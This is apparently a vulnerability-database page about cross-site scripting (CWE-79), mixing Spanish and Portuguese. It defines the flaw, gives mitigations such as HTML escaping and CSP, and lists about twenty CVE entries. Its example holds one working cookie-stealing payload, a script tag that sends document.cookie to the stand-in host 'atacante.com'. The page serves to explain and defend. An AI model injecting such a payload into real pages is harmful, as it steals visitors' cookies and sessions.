Fallos del tipo CWE-79

29.081 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2023-7063HIGHThe WPForms Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via form submission parameters in all versions up to, and EPSS 0.5%CVE-2021-42119HIGHStored XSS in Search Function in TopEaseEPSS 0.5%CVE-2024-25122HIGH Cross-site Scripting sidekiq-unique-jobs UI server vulnerabilityEPSS 0.5%CVE-2023-27294MEDIUMImproper neutralization of input during web page generation allows an authenticated attacker with access to a restricted account to submit mEPSS 0.5%CVE-2018-25073LOWNewcomer1989 TSN-Ranksystem bot.php getlog cross site scriptingEPSS 0.5%CVE-2024-8008MEDIUMReflected Cross-Site Scripting (XSS) in Multiple WSO2 Products via JDBC User Store Connection ValidationEPSS 0.5%CVE-2015-10079LOWjuju2143 WalrusIRC parser.js parseLinks cross site scriptingEPSS 0.5%CVE-2022-4637LOWep3-bs cross site scriptingEPSS 0.5%CVE-2018-25063LOWZenoss Dashboard defaultportlets.js cross site scriptingEPSS 0.5%CVE-2021-4325LOWNHN TOAST UI Chart Legend cross site scriptingEPSS 0.5%CVE-2023-6419MEDIUMCross-site Scripting vulnerability in Voovi Social Networking ScriptEPSS 0.5%CVE-2009-10004LOWTurante Sandbox Theme functions.php sandbox_body_class cross site scriptingEPSS 0.5%CVE-2022-3631MEDIUMOAuth Client by DigitialPixies <= 1.1.0 - Admin+ Stored Cross-Site ScriptingEPSS 0.5%CVE-2024-33525MEDIUMA Stored Cross-site Scripting (XSS) vulnerability in the "Import of organizational units and title of organizational unit" feature in ILIAS EPSS 0.5%CVE-2021-36401MEDIUMIn Moodle, ID numbers exported in HTML data formats required additional sanitizing to prevent a local stored XSS risk.EPSS 0.5%CVE-2022-47413MEDIUM Given a malicious document provided by an attacker, the OpenKM DMS is vulnerable to a stored (persistent, or "Type II") XSS condition. EPSS 0.5%CVE-2026-50699MEDIUMFrappe Framework 17.0.0-dev - Stored XSS in Auto Repeat dashboard schedule renderingEPSS 0.5%CVE-2021-4302LOWslackero phpwcms SVG File cross site scriptingEPSS 0.5%CVE-2018-25053MEDIUMmoappi Json2html json2html.js cross site scriptingEPSS 0.5%CVE-2022-3539MEDIUMTestimonials (Free < 2.7, Pro < 1.0.8) - Admin+ Stored Cross-Site ScriptingEPSS 0.5%